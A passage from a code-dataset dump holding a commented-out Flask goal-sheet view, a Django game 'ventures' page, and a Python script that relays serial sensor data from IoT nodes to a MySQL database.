request.args.get('empid') \n# if empIdStr and empIdStr.isdigit() : # If employee ID was n\n# empDict = getEmpDictbyEmpid(empIdStr)\n# empEmail = empDict['OFFICE_EMAIL_ID']\n# else :\n# empEmail = current_user.username.lower()\n# empInfo = getGoalSheetHeader(empEmail, year)\n# empId = str(empInfo['EmployeeID'])\n\n# #Get list of Goals, group-by-sectio\n# (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n# # Get All the Tasks for these goals, grouped nicely by goal-ID\n# if not sheet :\n# return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. 
Please contact your DC Lead.\")\n# msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n# empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n# alltasks = getAllTasks(allgoals)\n\n# #Set Authorization level = Check if its own item or someone else\n# ownItem = False\n# loginedInEmpId = getEmpIdIntByEmail(empEmail)\n# if (loginedInEmpId == sheet.empId) :\n# ownItem = True\n# authlevel = getAuthLevel(empEmail, ownItem, current_user.is_admin) # Get Auth Level\n# #getComments\n# (allSheetComments, allGoalComments, allTaskComments) = getAllComments(loginedInEmpId,sheet, allgoals, alltasks, authLevel = authlevel)\n# #Render\n# return render_template('goalsheet/goalfeedback.html', goalSheet = sheet,\\\n# goalSections = allgoalsections, \\\n# goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n# sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n# taskCmnts = allTaskComments, num=len(allgoalsections))\n\n# @app.route('/goals/xxxfeedbackviewmanager', methods=['GET'])\n# @login_required #Without login, we don't know who it is\n# def xxxfeedbackViewManager( year = '2018-2019') :\n# loggedInEmpEmail = current_user.username.lower()\n\n# empIdStr = request.args.get('empid')\n \n# if empIdStr and empIdStr.isdigit() : # If employee ID was n\n# empDict = getEmpDictbyEmpid(empIdStr)\n# empEmail = empDict['OFFICE_EMAIL_ID']\n# else :\n# return (\"error\")\n# empInfo = getGoalSheetHeader(empEmail, year)\n# empId = str(empInfo['EmployeeID'])\n# # print(\"empId = \" + empId)\n# #Get list of Goals, group-by-sectio\n# (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n# # Get All the Tasks for these goals, grouped nicely by goal-ID\n# if not sheet :\n# return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. 
Please contact your DC Lead.\")\n# msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n# empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n# alltasks = getAllTasks(allgoals)\n# #Set Flags\n# #Set Authorization level = Check if its own item or someone else\n# ownItem = False\n# loginedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n# if (loginedInEmpId == sheet.empId) :\n# ownItem = True\n# authlevel = getAuthLevel(loginedInEmpId, ownItem, current_user.is_admin) # Get Auth Level\n# print(\"getAuthLevel:\" + str(authlevel))\n# (allSheetComments, allGoalComments, allTaskComments) = getAllComments(int(empIdStr),sheet, allgoals, alltasks, authLevel = authlevel)\n# #Render\n# return render_template('goalsheet/goalfeedbackmanager.html', goalSheet = sheet,\\\n# goalSections = allgoalsections, \\\n# goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n# sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n# taskCmnts = allTaskComments, num=len(allgoalsections))\n\n","sub_path":"EmpDash/empDash_Goalsheet_OnlineExam/realapp/modules/goalsheet/feedbackview.py","file_name":"feedbackview.py","file_ext":"py","file_size_in_byte":9648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"33164434","text":"from django.contrib.auth import logout, authenticate, login\nfrom django.shortcuts import render\n\n\ndef ventures_view(request):\n ventures = [\n {\n \"image\": \"glyphicon-book\",\n \"title\": \"Book Store\",\n \"description\":\n \"Your chain of bookstores Borders isn't doing so well.\"\n },\n {\n \"image\": \"glyphicon-phone-alt\",\n \"title\": \"Call Center\",\n \"description\":\n \"Your help office has collapsed, killing all the workers. \\\n But you have collected 200% with insurance fraud! \\\n You're a real tycoon!\"\n },\n {\n \"image\": \"glyphicon-music\",\n \"title\": \"Music Business\",\n \"description\":\n \"Your website Napster has been shutdown by U.S. authorities. \\\n Better luck next time.\"\n }\n ]\n\n currentVenture = {\n \"image\": \"glyphicon-briefcase\",\n \"title\": \"Current Venture\",\n \"description\": \"You're doing good! 
Keep it up!\"\n }\n\n return render(\n request,\n 'ventures.html',\n dict(\n ventures=ventures,\n currentVenture=currentVenture\n )\n )\n","sub_path":"controllers/ventures.py","file_name":"ventures.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"319036702","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Ver 18 - 15 November 2017 -\n\nimport time\nimport serial\nimport string\nimport sys\nimport mysql.connector\nfrom mysql.connector import errorcode, pooling\nfrom db import * \nimport datetime\n#from threading import Thread\nimport multiprocessing as mp\n#import queue\n\nctrlStr = \"*../\"\n\ndef output(x):\n\tprint(str(datetime.datetime.now().time())[:8] + \" \"+ str(x))\n\tsys.stdout.flush()\n# -- DB Connection ---------------------------\ntry:\n db = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n output(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n output(\"Database does not exists\")\n else:\n output(err)\nelse:\n output(\"Start procedure\")\n# -- END DB Connection ---------------------------\n\n# -- DB Connection ---------------------------\ntry:\n dbx = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n output(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n output(\"Database does not exists\")\n else:\n output(err)\nelse:\n output(\"Start procedure\")\n# -- END DB Connection ---------------------------\n\n\n\n# -- Open Serial to the Coordinator---------------\n\nserCoord = serial.Serial('/dev/ttymxc3', 115200, timeout=10)\n#serCoord = serial.Serial('COM5', 115200, timeout=5)\nserCoord.timeout = 10\n\nserCoord.setDTR(False)\ntime.sleep(1)\n# toss any data already received, see\nserCoord.flushInput()\n\n# -- End Open Serial to the Coordinator-----------\n \n#----------------------------- \n# Global Variable declaration \n#----------------------------- \n \nendSerialChars = b\"\\r\\n\"\n\nglobal readSerial \nglobal serialBuffer \n\npnum = 5 #number of values to send for each sensor \n\n# coordinator commands\nINString = \"IN\" # to send Node data to the coordinator\nISString = \"IS\" # to send Sensor data to the coordinator\nIXString = \"IX\" # to send Address data to the coordinator\nIAString = \"IA\" # to send Actuators to the coordinator\nIMString = \"IM\" # to send Methods to the coordinator\nCommExecutedTrue = b\"CX1\\r\\n\"\nCommExecutedFalse = b\"CX0\\r\\n\"\nCommExecutedTrueX = b\"CX1\"\nCommExecutedFalseX = b\"CX0\"\nCommNotExecuted = b\"X\"\n \n#----------------------------- \n# End Global Variable declaration \n#----------------------------- \n\n\n#-- function to extract integer from strings\ndef parseint(string):\n return int(''.join([x for x in string if x.isdigit()]))\n\ndef log(t, m):\n\t#curLog = db.cursor()\n\tsql = \"insert into tblog (type,msg) VALUES (%s, %s)\" \n\t#try:\n\t\t#curLog.execute(sql, (t,m))\n\t\t#db.commit()\n\t\t#curLog.close()\n\t#except:\n\t\t#raise\n\t#curLog.close()\t\n\ndef printTime():\n\tnow = datetime.datetime.now()\n\tprint(now.strftime(\"%H %M %S %f\"))\t\n\t\ndef checkInit():\n\t# check Init \n\tsql = \"SELECT pvalue,pindex FROM tbparam WHERE ptype = 'I'\" \n\tcur.execute(sql)\n\tfor (pvalue,pindex) in cur:\n\t\ti = int(\"{}\".format(pindex))\n\t\tif i == 1:\n\t\t\toutput 
(\"Initialize Coordinator\")\n\t\t\tsql = \"UPDATE tbparam SET pvalue = 0 WHERE ptype = 'I'\" \n\t\t\tcur.execute(sql)\n\t\t\tdb.commit()\n\t\t\tcur.close\n\t\t\tinitCoordinator()\n\t\t\tbreak\n\tsys.stdout.flush()\t\t\n\t# end check Init\n\t\n#-- Send Init data to the Coordinator --# \ndef initCoordinator(): \n\n\tprintTime()\n\toutput (\"Initializing...\")\n\n\tglobal pnum\n\tglobal INString\n\tglobal IXString\n\tglobal ISString\n\tglobal IAString\n\tglobal IMString\n\t\n\tcur = db.cursor()\n\t\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin building string to send out-------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t# set numbers of parameters to build the string to send to the coordinator \t\n\t# count the number of nodes \n\tsql = \"select count(*) as CNT from vwnodes WHERE nodetype != 0\" #exclude external node\n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tnodeNum=parseint(\"{}\".format(CNT))\n\t\tINString = INString + str(nodeNum*pnum)\n\tsql = \"select count(*) as CNT from vwnodes WHERE nodetype = 2\" #xbee nodes\n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tnodeNum=parseint(\"{}\".format(CNT))\n\t\tIXString = IXString + str(nodeNum)\n\t# retrieve node data and buid initialization strings\n\tsql = \"select id, xbee_high_address, xbee_low_address, nodetype from vwnodes WHERE nodetype != 0 AND status = 1 order by id\" \n\tcur.execute(sql)\n\tfor (id, xbee_high_address, xbee_low_address, nodetype) in cur:\t\t\t\n\t\tINString = INString + \",\" + \"{}\".format(id) + \",\" + \"{}\".format(nodetype) + \",0,0,1\"\n\t\tif int(\"{}\".format(nodetype)) == 2: #xbee \n\t\t\tIXString = IXString + \",\" + \"{}\".format(id) + \",\" + \"{}\".format(xbee_high_address) + \",\" + \"{}\".format(xbee_low_address)\n\t#db.commit()\n\t# count the number of sensors \n\tsql = \"select count(*) as CNT from vwsensors where tbNodeType_id != 0\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tsensorNum=parseint(\"{}\".format(CNT))\n\t\tISString = ISString + str(sensorNum*pnum)\n\tdb.commit()\n\t#//col 0=node 1=sensor 2=value 3=alarm 4=spare\t\n #retrieve sensor data and build initialization strings\n\tsql = \"SELECT nodeid,tbnodetype_id,tbsensortype_id,pin_number FROM vwsensors where tbnodetype_id != 0 and tbstatus_id = 1 order by nodeid,pin_number\" \n\tcur.execute(sql)\n\tfor (nodeid,tbnodetype_id,tbsensortype_id,pin_number) in cur:\t\t\t\n\t\t\tISString = ISString + \",\" + \"{}\".format(nodeid) + \",\" + \"{}\".format(pin_number) + \",0,0,0\"\t\n\t#db.commit()\n\t# count the number of actuators \n\tsql = \"select count(*) as CNT from vwactuator\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tactuatorNum=parseint(\"{}\".format(CNT))\n\t\tIAString = IAString + str(actuatorNum*pnum)\t\n\tdb.commit()\n\t#//col 0=node 1=sensor 2=value 3=alarm 4=spare\t\n #retrieve actuator data and build initialization strings\n\tsql = \"select tbnode_id,pinnumber from tbactuator order by tbnode_id,pinnumber\" \n\tcur.execute(sql)\n\tfor (tbnode_id,pinnumber) in cur:\t\t\t\n\t\t\tIAString = IAString + \",\" + \"{}\".format(tbnode_id) + \",\" + \"{}\".format(pinnumber) + \",0,0,0\"\n\t\t\t\t\t\n\t# count the number of methods \n\tsql = \"select count(*) as CNT from vwmethods\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tmethodNum=parseint(\"{}\".format(CNT))\n\t\tIMString = IMString + 
str(methodNum*pnum)\t\n\tdb.commit()\n\t#//col 0=node 1=actuator 2=method 3=value 4=spare\t\n #retrieve method data and build initialization strings\n\tsql = \"select tbnode_id,pinnumber,method from vwmethods order by tbnode_id,pinnumber,method\" \n\tcur.execute(sql)\n\tfor (tbnode_id,pinnumber,method) in cur:\t\t\n\t\t\tIMString = IMString + \",\" + \"{}\".format(tbnode_id) + \",\" + \"{}\".format(pinnumber) + \",\" + \"{}\".format(method) + \",0,0\"\t\t\t\n\tdb.commit()\t\n\tcur.close\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----end building string to send out---------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin Sending init string to the coordinator -------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\toutput(\"Init sensors\")\n\tret = initSendStringsToCoordinator(ISString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init actuators\")\n\t#output(IAString)\n\tret = initSendStringsToCoordinator(IAString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init methods\")\n\tret = initSendStringsToCoordinator(IMString) \n\tif ret == 0: #if fails\n\t\treturn 0\t\t\n\toutput(\"Init nodes\")\n\tret = initSendStringsToCoordinator(INString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init node addresses Xbee\")\n\tret = initSendStringsToCoordinator(IXString) \n\tif ret == 0: #if fails\n\t\treturn 0\t\t\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----end Sending init string to the coordinator ---------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t# if Ok\n\tcur.close\n\toutput (\"End Initializing\")\n\treturn 1\n\t\ndef isResponse(response):\n\tif \"CX0\" in str(response, 'utf-8'):\n\t\treturn True\n\telif \"CX1\" in str(response, 'utf-8'):\t\n\t\treturn True\n\telse:\n\t\treturn False\t\n\t\t\ndef isResponseOK(response):\n\tprint(response)\n\tres = False\n\tif \"CX0\" in str(response, 'utf-8'):\n\t\tprint(1)\n\t\tres = False\n\telif \"CX1\" in str(response, 'utf-8'):\t\n\t\tprint(2)\n\t\tres = True\n\telse:\n\t\tprint(3)\n\t\tres = False\t\n\tprint(\"qqq:\")\t\n\t#print(\"xx:\", str(response))\n\treturn res\t\t\t\n\n#--------------------------------------------------------------------------------------------------------#\n#---- get serial incoming data ---------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\ndef getSerialData(qDataIn, qDataOut, qResponse):\n\tserCoord.flushInput()\n\treadSerial = \"\"\n\tserCoord.timeout = 1\n\twhile True:\n\t\t#output(\"Waiting for data on serial\")\n\t\tserialBuffer = serCoord.inWaiting()\n\t\tif serialBuffer > 0: #data available on serial\n\t\t\treadSerial = serCoord.readline()\n\t\t\treadSerial.rstrip(endSerialChars)\n\t\t\toutput(\"Data received from serial\")\n\t\t\tif isResponse(readSerial) == True:\n\t\t\t\twhile not 
qResponse.empty():\n\t\t\t\t\tqResponse.get()\n\t\t\t\tqResponse.put(readSerial)\n\t\t\t\toutput(\"Response received\")\t\t\t\n\t\t\telse:\t\n\t\t\t\tqDataIn.put(readSerial)\t\n\t\t\t\t#print(\"Data received:\", serialBuffer)\n\t\t\t\t#print(\"Q size:\", qDataIn.qsize()) \t\n\n\t\tif not qDataOut.empty():\n\t\t\t#print(\"Q OUT size:\", qDataOut.qsize()) \n\t\t\tstg = qDataOut.get()\n\t\t\tserCoord.write(bytes(stg, 'UTF-8')) \n\t\t\toutput(\"String: \" + str(stg))\n\n\t\t\t\t\n#--------------------------------------------------------------------------------------------------------#\n#---- Receive data from coordinator ---------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\n\t\ndef AUTOreceiveDataFromCoordinator(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1): # CR0=sensors CR1=nodes CR3=Actuators CR5=All CommExecutedTrue = \"CX1\" CommExecutedFalse = \"CX0\"\n\tglobal endSerialChars\n\tif not qDataIn.empty(): # if there is data to process\n\t\treadSerial = qDataIn.get()\t\n\t\tarrayData = str(readSerial).split(',')\n\t\toutput(\"Parsing received data: \" + str(len(arrayData)))\n\t\tdNum = int((len(arrayData)-1)/(pnum+1))\n\t\tif dNum != 0: #if data received on serial\n\t\t\t#--- Write data to database ---#\n\t\t\tsql = \"\"\n\t\t\tif (parseint(arrayData[0])) != 99: #check the first value if is NOT 99 = smartlight command\t\n\t\t\t\tsql = \"insert into tbdatain (timekey,type,\" \n\t\t\t\tx = 0\n\t\t\t\twhile x < pnum-1:\n\t\t\t\t\tsql = sql+ \"V\" + str(x) + \",\"\t\n\t\t\t\t\tx = x+1\n\t\t\t\telse:\t\n\t\t\t\t\tsql = sql+ \"V\" + str(x)\t+ \") values \"\t\n\t\t\t\t# create Value part of insert statement\t\t\t\t\n\t\t\t\tfor i in range(0, dNum):\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 0:\n\t\t\t\t\t\tsql = sql+ \"(millis(),1\" # sensor\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 1:\n\t\t\t\t\t\tsql = sql+ \"(millis(),0\" # node\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 3:\n\t\t\t\t\t\tsql = sql+ \"(millis(),2\" # actuator\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 9:\n\t\t\t\t\t\tsql = sql+ \"(millis(),9\" # method\t\t\n\t\t\t\t\tfor v in range((i*(pnum+1))+1, (i*(pnum+1))+pnum+1):\t\t\t\t\t\n\t\t\t\t\t\tsql = sql + \",\" + str(parseint(arrayData[v])) + \"\"\n\t\t\t\t\tsql = sql + \")\"\t\n\t\t\t\t\tif i != dNum-1:\n\t\t\t\t\t\tsql = sql + \",\"\t\t\t\t\t\n\t\t\telif (parseint(arrayData[0])) == 99: #smart light command\n\t\t\t\toutput(\"Ricevuto comando luci\")\n\t\t\t\t# get the smartlight_id\n\t\t\t\tnode = str(parseint(arrayData[1]))\n\t\t\t\tpin = str(parseint(arrayData[2]))\n\t\t\t\tsts = str(parseint(arrayData[3]))\n\t\t\t\tdim = str(parseint(arrayData[4]))\n\t\t\t\tcolor = str(parseint(arrayData[5]))\n\t\t\t\tdev_type = 0\n\t\t\t\tif pin != \"0\": #it is a light 0 = group\n\t\t\t\t\tdev_type = 1\n\t\n\t\t\t\twhile not qResult1.empty(): #attendo risutato\n\t\t\t\t\trow = qResult1.get()\n\t\t\t\t\tsmartlight_id = int(row[0])\n\t\t\t\t\tactuator_id = int(row[1])\n\t\t\t\t\tnode_id = int(row[2])\n\t\t\t\t\tpinnumber = int(row[3])\t\n\t\t\t\t\t\n\t\t\t\t\tif int(pin) == int(pinnumber) and int(node) == int(node_id):\t\t\t\n\t\t\t\t\t\t#millis\n\t\t\t\t\t\t#type always=0, for future use\n\t\t\t\t\t\t#V0=pin\n\t\t\t\t\t\t#V1=status\n\t\t\t\t\t\t#V2=value\n\t\t\t\t\t\t#V3=color/mood\n\t\t\t\t\t\t#V4=actuator_id\n\t\t\t\t\t\t#V5=smartlight_id\n\t\t\t\t\t\t#V6=type\n\t\t\t\t\t\t#V7=command origin 99=switch\n\t\t\t\t\t\tsql = 
\"insert into tbdataoutsmartlight (timekey,type,V0,V1,V2,V3,V4,V5,V6,V7) values \" \n\t\t\t\t\t\t# create Value part of insert statement\t\t\n\t\t\t\t\t\tsql = sql+ \"(millis(),0\" # action type 1 set color\n\t\t\t\t\t\tsql = sql+ \",\" + str(pin) \n\t\t\t\t\t\tsql = sql+ \",\" + sts\n\t\t\t\t\t\tsql = sql+ \",\" + dim\n\t\t\t\t\t\tsql = sql+ \",\" + color #color/mood\t\n\t\t\t\t\t\tsql = sql+ \",\" + str(actuator_id)\t \n\t\t\t\t\t\tsql = sql+ \",\" + str(smartlight_id) \n\t\t\t\t\t\tsql = sql+ \",\" + str(dev_type) + \",99)\"\n\t\t\t\t\t\t#print(sql)\t\t\t\t\t\t\t\t\t\t\n\t\t\t# execute sql\n\t\t\tqSQL.put(sql)\n\treturn\n\t\t\t\n#--------------------------------------------------------------------------------------------------------#\n#---- End AUTOreceiveDataFromCoordinator --------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\n\ndef initSendStringsToCoordinator(stg): \n\tserCoord.flushInput()\n\toutput(stg)\n\t# send the node string\n\tattemptsCnt = 0\n\twhile serCoord.inWaiting() == 0 and attemptsCnt < 5:\n\t\tret = serCoord.write(bytes(stg, 'UTF-8')) \n\t\treadSerial = serCoord.readline()\n\t\tif readSerial == CommExecutedTrue:\n\t\t\treturn 1\n\t\t\ttime.sleep(0.2)\n\t\t\tbreak\n\t\telif readSerial == CommExecutedFalse:\n\t\t\t# write error in log\n\t\t\tlog(\"E\", \"Error \"+stg)\n\t\telse:\n\t\t\tattemptsCnt = attemptsCnt + 1\n\t\t\toutput(attemptsCnt)\n\t\t\tcontinue\n\t# write error in log\n\tlog(\"E\", \"no serial available\")\n\treturn 0\n\ndef sendCommand(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2): \n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin building string to send out-------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t#0=set trigger\n\t#1=delete local trigger \n\t#2=set actuator \n\t#3=reset remote trigger\n\t#4=set remote trigger\n\t#5=delete remote trigger\n\t#6=set time\n\t#7=set meteo\n\t#8=set meteo forecast\n\t#9=set meteo forecast temp\n\t#10=set smartlight\n\tif qResult2.qsize() > 0: #attendo risutato\n\t\trow = qResult2.get()\n\t\ttimekey = row[0]\n\t\ttype = int(row[1])\n\t\tV0 = str(row[2])\n\t\tV1 = str(row[3])\n\t\tV2 = str(row[4])\n\t\tV3 = str(row[5])\n\t\tV4 = str(row[6])\n\t\tV5 = str(row[7])\n\t\tV6 = str(row[8])\n\t\tV7 = str(row[9])\n\t\tV8 = str(row[10])\n\t\tV9 = str(row[11])\n\t\tV10 = str(row[12])\n\t\tif type == 0:\n\t\t\toutput(\"Set trigger\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 1:\n\t\t\toutput(\"Reset trigger\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 2:\n\t\t\toutput(\"Set actuator\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 3:\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",0,0,0,0,0,0,0\"\n\t\tif type == 4:\n\t\t\toutput(\"Set remote triggers\")\n\t\t\t## 0=sensor number \n\t\t\t## 1=immediate alarm 1=permanent 2=temporary 3=flipflop\n\t\t\t## 2=actuator \n\t\t\t## 3=level min\n\t\t\t## 4=status \n\t\t\t## 5=current value\n\t\t\t## 6=level max\n\t\t\t## 7=output type 0=analog 1=digital\n\t\t\t## 8=action out of range\n\t\t\t## 9=action in range\n\t\t\t## 10=timer 
time\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",0,\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 + \",\" + V9 + \",\" + V10\n\t\tif type == 5:\n\t\t\toutput(\"Deleting remote trigger\")\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",0,0,0,0,0,0,0,0,0,0\"\t\n\t\tif type == 6:\n\t\t\toutput(\"Set time\")\n\t\t\tstg = \"CT,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 7:\n\t\t\toutput(\"Set meteo\")\n\t\t\tstg = \"CM,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 \n\t\tif type == 8:\n\t\t\toutput(\"Set meteo forecast\")\n\t\t\tstg = \"CF,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 \n\t\tif type == 9:\n\t\t\toutput(\"Set meteo forecast temperature\")\n\t\t\tstg = \"CG,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 \t\t\t\t\n\t\tif type == 10:\n\t\t\toutput(\"Set smartlight commands\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 sts\n\t\t\t#V3 value\n\t\t\t#V4 color/mood\n\t\t\tstg = \"CC,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4\n\t\tif type == 11:\n\t\t\toutput(\"Setup smartlight configuration (all device type)\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 type\n\t\t\t#V3 mode 0=insert 1=delete 2=update\n\t\t\tstg = \"CD,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 \t\t\t\t\t\t\t\t\n\t\tif type == 12:\n\t\t\toutput(\"Setup smartlight configuration group MOODs\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 group pin\n\t\t\t#V3 mood1\n\t\t\t#V4 mood2\n\t\t\t#V5 ...\n\t\t\tstg = \"CE,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 + \",\" + V9 + \",\" + V10\n\t\t#-- common part --#\n\t\t#-- Try until 3 times to transmit --#\n\t\tfor i in range(3):\t\n\t\t\t# send the string\n\t\t\tqDataOut.put(stg)\n\t\t\toutput(\"Waiting for the response for attempt \" + str(i))\n\t\t\t#print(\"stampa stringa:\", stg)\n\t\t\tsResponse = \"empty\"\n\t\t\tinitTime = time.time() + 3 #set timeout for the next loop\n\t\t\tloop = 0\n\t\t\twhile loop == 0: #data available on serial\n\t\t\t\tif initTime < time.time():\n\t\t\t\t\toutput(\"Tempo scaduto\")\n\t\t\t\t\tloop = 1\n\t\t\t\tif not qResponse.empty():\n\t\t\t\t\tsResponse = qResponse.get()\n\t\t\t\t\tloop = 1\n\t\t\tif sResponse == CommExecutedTrue: #good response, transmission Ok\n\t\t\t\toutput (\"Response OkOkOkOKOkOkOk\")\n\t\t\t\tbreak\n\t\t\telse: #bad response\t\t\n\t\t\t\toutput (\"Error. trying again....\")\t\t\n\t\t\t\t\n\t\t\t#if isResponseOK(sResponse) == True: #good response, transmission Ok\n\t\t\t#\toutput (\"Response OkOkOkOKOkOkOk\")\n\t\t\t#\tbreak\n\t\t\t#else: #isResponseOK(sResponse) == False: #bad response\t\t\n\t\t\t#\toutput (\"Error. 
trying again....\")\t\t\n\treturn\n\t\ndef runP2(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1):\n\twhile True:\n\t\tAUTOreceiveDataFromCoordinator(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1)\n\t\ttime.sleep(0.1)\n\t\t\ndef runP3(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2):\n\twhile True:\n\t\tsendCommand(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2)\n\t\ttime.sleep(0.1)\n\t\t\ndef execSQL(qSQL, qQuery1, qResult1, qQuery2, qResult2):\n\tcur = db.cursor()\n\tcurX = db.cursor()\n\twhile True:\n\t\ttry:\n\t\t\tif not qSQL.empty():\n\t\t\t\tsql = qSQL.get()\n\t\t\t\tinssql = \"UPDATE tbqueue SET timekey = millis(), code = '\" + sql + \"'\"\n\t\t\t\tcur.execute(inssql)\n\t\t\t\tdb.commit()\n\t\t\t\t#print(\"command executed:\", inssql)\n\t\t\t\t#print(\"Command executed\")\n\t\t\t\t\n\t\t\tif qResult1.empty():\n\t\t\t\tsql = \"SELECT smartlight_id, tbactuator_id, tbnode_id, pinnumber FROM vwsmartlight\"\n\t\t\t\tcur.execute(sql)\n\t\t\t\trow = cur.fetchone()\n\t\t\t\twhile row is not None:\t\n\t\t\t\t\tqResult1.put(row)\n\t\t\t\t\trow = cur.fetchone()\n\t\t\t#print(\"qResult1 size:\", qResult1.qsize())\t\t\t\n\n\t\n\t\t\tif qResult2.empty():\n\t\t\t\tsql = \"select timekey,type,V0,V1,V2,V3,V4,V5,V6,V7,V8,V9,V10 from tbdataout order by timekey asc\"\n\t\t\t\tcur.execute(sql)\n\t\t\t\trow = cur.fetchone()\n\t\t\t\twhile row is not None:\t\t\t\t\t\t\t\n\t\t\t\t\tqResult2.put(row)\n\t\t\t\t\tsql = \"delete from tbdataout where timekey = \" + str(row[0])\n\t\t\t\t\tcurX.execute(sql)\n\t\t\t\t\trow = cur.fetchone()\n\t\t\t\tdb.commit()\n\t\t\t\n\t\t\tif qResult2.qsize() > 0:\t\t\t\n\t\t\t\toutput(\"Commands to send: \" + str(qResult2.qsize()))\t\t\t\n\t\t\t\t\n\t\texcept mysql.connector.Error as err:\n\t\t\toutput(\"SQL error: {}\".format(err))\t\n\t\ttime.sleep(0.1)\t\t\n\t\t\ndef Main():\n\n\tpool = mp.Pool()\n\tmanager = mp.Manager()\n\n\t# create managed queues\t\n\tqDataIn = manager.Queue()\n\tqDataOut = manager.Queue()\n\tqResponse = manager.Queue()\n\tqQuery1 = manager.Queue()\n\tqQuery2 = manager.Queue()\n\tqResult1 = manager.Queue()\n\tqResult2 = manager.Queue(maxsize=0)\n\tqSQL = manager.Queue()\n\t\n\tp1 = pool.apply_async(getSerialData, (qDataIn, qDataOut, qResponse))\n\tp2 = pool.apply_async(runP2, (qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1))\n\tp3 = pool.apply_async(runP3, (qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2))\n\tp4 = pool.apply_async(execSQL, (qSQL, qQuery1, qResult1, qQuery2, qResult2))\n\n\tpool.close()\n\tpool.join()\n \n\treturn\t\t\t\t\n\n#------- Main section ----------------------------#\n#------- Run once --------------------------------#\nlog(\"I\", \"Initialize 